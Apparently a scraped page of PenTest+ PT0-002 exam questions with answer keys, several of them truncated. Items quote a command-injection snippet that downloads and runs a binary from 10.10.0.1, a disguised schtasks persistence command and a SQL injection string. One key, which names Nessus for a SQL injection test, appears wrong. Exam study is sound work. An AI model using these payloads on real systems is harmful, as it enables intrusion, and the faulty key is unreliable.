PT0-002 exam

Which of the following tools would be BEST suited to perform a manual web application security assessment? (Choose two.)A . OWASP ZAP B. Nmap C. Nessus D. BeEF E. Hydra F. Burp SuiteView AnswerAnswer: A,F

HOTSPOT You are a security analyst tasked with hardening a web server. You have been given a list of HTTP payloads that were flagged as malicious. INSTRUCTIONS Given the following attack signatures, determine the attack type, and then identify the associated remediation to prevent the attack in the future. If...

A penetration tester found the following valid URL while doing a manual assessment of a web application: http://www.example.com/product.php?id=123987. Which of the following automated tools would be best to use NEXT to try to identify a vulnerability in this URL?A . SQLmap B. Nessus C. Nikto D. DirBusterView AnswerAnswer: B

A penetration tester was able to gain access to a system using an exploit. The following is a snippet of the code that was utilized: exploit = “POST ” exploit += “/cgi-bin/index.cgi?action=login&Path=%27%0A/bin/sh${IFS} C c${IFS}’cd${IFS}/tmp;${IFS}wget${IFS}http://10.10.0.1/apache;${IFS}chmod${IFS}777${IFS }apache;${IFS}./apache’%0A%27&loginUser=a&Pwd=a” exploit += “HTTP/1.1” Which of the following commands should the penetration tester run post-engagement?A ....

A penetration tester successfully performed an exploit on a host and was able to hop from VLAN 100 to VLAN 200. VLAN 200 contains servers that perform financial transactions, and the penetration tester now wants the local interface of the attacker machine to have a static ARP entry in the...

A penetration tester was able to gain access successfully to a Windows workstation on a mobile client’s laptop. Which of the following can be used to ensure the tester is able to maintain access to the system?A . schtasks /create /sc /ONSTART /tr C:TempWindowsUpdate.exe B. wmic startup get caption,command C....

A red team completed an engagement and provided the following example in the report to describe how the team gained access to a web server: x’ OR role LIKE '%admin% Which of the following should be recommended to remediate this vulnerability?A . Multifactor authentication B. Encrypted communications C. Secure software...

A penetration tester is preparing to perform activities for a client that requires minimal disruption to company operations. Which of the following are considered passive reconnaissance tools? (Choose two.)A . Wireshark B. Nessus C. Retina D. Burp Suite E. Shodan F. NiktoView AnswerAnswer: A,E Explanation: Reference: https://resources.infosecinstitute.com/topic/top-10-network-recon-tools/

HOTSPOT You are a security analyst tasked with hardening a web server. You have been given a list of HTTP payloads that were flagged as malicious. INSTRUCTIONS Given the following attack signatures, determine the attack type, and then identify the associated remediation to prevent the attack in the future. If...

A penetration tester exploited a vulnerability on a server and remotely ran a payload to gain a shell. However, a connection was not established, and no errors were shown on the payload execution. The penetration tester suspected that a network device, like an IPS or next-generation firewall, was dropping the...